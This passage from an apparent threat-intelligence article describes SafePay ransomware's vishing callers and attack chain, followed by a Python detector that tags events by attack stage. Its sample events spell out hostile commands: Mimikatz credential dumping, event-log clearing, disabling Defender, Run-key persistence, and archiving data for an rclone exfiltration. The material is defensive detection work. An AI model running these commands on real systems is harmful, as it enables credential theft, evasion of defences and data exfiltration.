
Callers are usually fluent in English and often other languages, and they have strong verbal and conversational skills. The role of a caller is to phone a target, impersonate a trusted figure, and manipulate the victim into participating in the scam. This is a specialized kind of con that some ransomware groups prefer to hand off to someone else. Whether a group uses internal or third-party callers, you cannot assume that a vishing scammer will have a noticeable accent or an AI-generated voice.
You can see examples of attempted vishing scams and aggressive callers in ‘scambaiting’ videos on YouTube. Fair warning: Some scambaiters remove offensive language and phrases, but you may want to assume all scambaiting content is inappropriate for work and kids.
SafePay attack chain
Aside from social engineering, SafePay has been observed using stolen credentials, weak or default passwords, exploits and security misconfigurations to gain access to systems. The group may establish access on its own or purchase it from an initial access broker (IAB). After initial access is established, the attack proceeds through the typical steps.
Privilege escalation: Once inside the network, the attackers escalate privileges to gain deeper control. Techniques include exploiting operating system vulnerabilities and weak security settings, and dumping credentials with tools like Mimikatz. This moves the attack from basic user access to administrator or system-level rights. With that level of access, the later phases of the attack proceed largely unimpeded.
Lateral movement: The attackers move through the network to discover sensitive data and additional resources. By this point they rely heavily on "living-off-the-land" techniques (built-in administrative tools and legitimate utilities already present on the hosts) to map the network and carry out other steps in the attack, which makes this activity hard to distinguish from routine administration.
Defense evasion: The attackers attempt to disable antivirus, clear event logs, obfuscate malicious code, and modify registry keys to silence security alerts. SafePay also attempts to establish persistence, usually by modifying startup items or configuring remote access software. Persistence lets them resume an interrupted attack and retain long-term access to the system if needed.
Data collection & exfiltration: Data is identified, collected, and compressed for exfiltration. SafePay has been observed using WinRAR and 7-Zip for compression, and Rclone and FileZilla (FTP) for data transfer. All four are legitimate tools, so the signal is the combination: an archiver run against file shares followed by a large outbound transfer from the same host.
Encryption & extortion: Once critical data has been exfiltrated, the ransomware payload encrypts the files and appends a .safepay extension to each one. SafePay drops a ransom note (readme_safepay.txt) with payment instructions and threats to publish the stolen data on its leak site. The extension and the note filename are the on-disk indicators to alert on, but by the time they appear the exfiltration has already happened.
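To show how the chain above translates into detection logic, here is an added example (not SafePay's tooling and not any vendor's detection content) that tags process and file events with the phase they match, using only the indicators the text names: Mimikatz, event log clearing, registry tampering with security tooling, WinRAR/7-Zip compression, Rclone/FileZilla transfer, the .safepay extension and readme_safepay.txt. The event field names (image, cmdline, target), the sample events and the specific commands for clearing logs and writing a Run key are assumptions, not observed SafePay telemetry.

```python
"""Stage tagger for the SafePay attack chain described above (added example)."""
import re
from collections import defaultdict

# Rules are ordered; the first regex that matches the lowercased
# "image + command line" decides the stage. Indicators come from the text
# above plus two assumed-standard commands: "wevtutil cl" for clearing logs
# and a CurrentVersion\Run write for startup-item persistence.
PROCESS_RULES = [
    ("privilege_escalation", re.compile(r"\bmimikatz\b|sekurlsa::|lsadump::")),
    ("defense_evasion", re.compile(r"wevtutil(\.exe)?\s+cl\b|clear-eventlog")),
    ("defense_evasion", re.compile(
        r"\breg(\.exe)?\s+add\b.*(disableantispyware|disablerealtimemonitoring)")),
    ("persistence", re.compile(r"\\currentversion\\run\b")),
    ("collection", re.compile(r"\b(7z|7za|winrar|rar)(\.exe)?\s+a\b")),
    ("exfiltration", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b|\bfilezilla\b")),
]
# File events: the on-disk artefacts named in the text.
FILE_RULES = [
    ("encryption", re.compile(r"\.safepay$")),
    ("extortion", re.compile(r"(^|\\)readme_safepay\.txt$")),
]
STAGE_ORDER = ["privilege_escalation", "defense_evasion", "persistence",
               "collection", "exfiltration", "encryption", "extortion"]


def classify(event):
    """Return the chain stage an event matches, or None for benign activity."""
    if event["type"] == "process":
        text = f"{event.get('image', '')} {event.get('cmdline', '')}".lower()
        rules = PROCESS_RULES
    elif event["type"] == "file":
        text = event.get("target", "").lower()
        rules = FILE_RULES
    else:
        return None
    for stage, rx in rules:
        if rx.search(text):
            return stage
    return None


def detect_chain(events):
    """Group matching events by stage: {stage: [event, ...]}."""
    hits = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            hits[stage].append(ev)
    return dict(hits)


def stages_seen(events):
    """Stages observed, listed in kill-chain order regardless of event order."""
    hits = detect_chain(events)
    return [s for s in STAGE_ORDER if s in hits]


def exfil_before_encrypt(events):
    """True when an exfiltration event precedes the first .safepay rename,
    i.e. the exfiltrate-then-encrypt ordering the text describes."""
    first_exfil = first_enc = None
    for i, ev in enumerate(events):
        stage = classify(ev)
        if stage == "exfiltration" and first_exfil is None:
            first_exfil = i
        elif stage == "encryption" and first_enc is None:
            first_enc = i
    return first_exfil is not None and first_enc is not None and first_exfil < first_enc


# Constructed sample events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process", "image": r"C:\Users\Public\mimikatz.exe",
     "cmdline": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"type": "process", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"type": "process", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
                r" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"},
    {"type": "process", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
                r" /v Updater /d C:\Temp\svc.exe /f"},
    {"type": "process", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z a -pSecret C:\Temp\fin.7z D:\Finance"},
    {"type": "process", "image": r"C:\Temp\rclone.exe",
     "cmdline": r"rclone copy C:\Temp\fin.7z remote:drop --transfers 8"},
    {"type": "file", "target": r"D:\Finance\Q3-report.xlsx.safepay"},
    {"type": "file", "target": r"D:\Finance\readme_safepay.txt"},
]

if __name__ == "__main__":
    for stage, evs in detect_chain(SAMPLE_EVENTS).items():
        print(f"{stage:22s} {len(evs)} event(s)")
    print("stages:", stages_seen(SAMPLE_EVENTS))
    print("exfil before encrypt:", exfil_before_encrypt(SAMPLE_EVENTS))
```

The point of tagging by stage rather than alerting on each rule alone is that every indicator except the .safepay artefacts is a legitimate tool or command in isolation; a host that trips the credential-dumping, log-clearing and archiver rules within a short window is the signal worth paging on, and exfil_before_encrypt flags the double-extortion ordering while there may still be time to cut the outbound transfer.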
